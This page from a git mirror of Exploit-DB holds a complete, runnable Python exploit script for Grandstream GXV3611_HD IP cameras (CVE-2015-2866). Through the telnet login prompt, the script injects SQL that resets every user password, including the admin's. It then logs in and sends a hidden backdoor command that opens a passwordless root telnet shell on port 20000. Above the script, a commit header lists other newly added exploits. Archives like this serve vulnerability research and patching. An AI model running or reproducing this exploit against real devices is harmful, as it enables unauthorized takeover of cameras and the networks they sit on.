bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/platforms/hardware/remote/40441.py
Offensive Security d9bdc2e376 DB: 2016-10-04 
7 new exploits

maplab ms4w 2.2.1 - Remote File Inclusion
MapLab MS4W 2.2.1 - Remote File Inclusion

Gimp 2.2.14 (Windows x86) - '.ras' Download/Execute Buffer Overflow
Gimp 2.2.14 (Win x86) - '.ras' Download/Execute Buffer Overflow

Grandsteam GXV3611_HD - SQL Injection

Glassfish Server - Unquoted Service Path Privilege Escalation
Windows Firewall Control - Unquoted Service Path Privilege Escalation
Android - Insufficient Binder Message Verification Pointer Leak
DWebPro 8.4.2 - Multiple Vulnerabilities
Apache Tomcat 8/7/6 (Debian-Based Distros) - Privilege Escalation
Street Fighter 5 - 'Capcom.sys' Kernel Execution (Metasploit)
2016-10-04 05:01:17 +00:00

45 lines
No EOL
1.6 KiB
Python
Executable file
Raw Blame History

# Exploit Title: Grandstream GXV3611_HD Telnet SQL Injection and backdoor command
# Exploit Author: pizza1337
# Vendor Homepage: http://www.grandstream.com/
# Version: GXV3611_HD Core 1.0.3.6, 1.0.4.3
# GXV3611IR_HD Core 1.0.3.5
# Tested on:
# -GXV3611_HD
# Bootloader Version: 1.0.0.0
# Core Version: 1.0.4.3
# Base Version: 1.0.4.43
# Firmware Version: 1.0.4.43
# -GXV3611IR_HD
# Bootloader Version: 1.0.3.5
# Core Version: 1.0.3.5
# Base Version: 1.0.3.5
# Firmware Version: 1.0.3.5
# CVE : CVE-2015-2866
# Category: remote
# More information:
# https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-2866
# https://www.kb.cert.org/vuls/id/253708
# Description:
# http://boredhackerblog.blogspot.com/2016/05/hacking-ip-camera-grandstream-gxv3611hd.html
import telnetlib
import sys
if len(sys.argv) < 2:
print "USAGE: python %s IP_ADDRESS"%sys.argv[0]
quit()
conn = telnetlib.Telnet(sys.argv[1])
conn.read_until("Username: ")
conn.write("';update user set password='a';--\r\n") #This changes all the passwords to a, including the admin password
conn.read_until("Password: ")
conn.write("nothing\r\n")
conn.read_until("Username: ")
conn.write("admin\r\n")
conn.read_until("Password: ")
conn.write("a\r\n") #Login with the new password
conn.read_until("> ")
conn.write("!#/ port lol\r\n") #Backdoor command triggers telnet server to startup. For some reason, typing "!#/ port" does not seem to work.
conn.read_until("> ")
conn.write("quit\r\n")
conn.close()
print "Telnet into port 20000 with username root and no password to get shell" #There is no login password
Reference in a new issue View git blame Copy permalink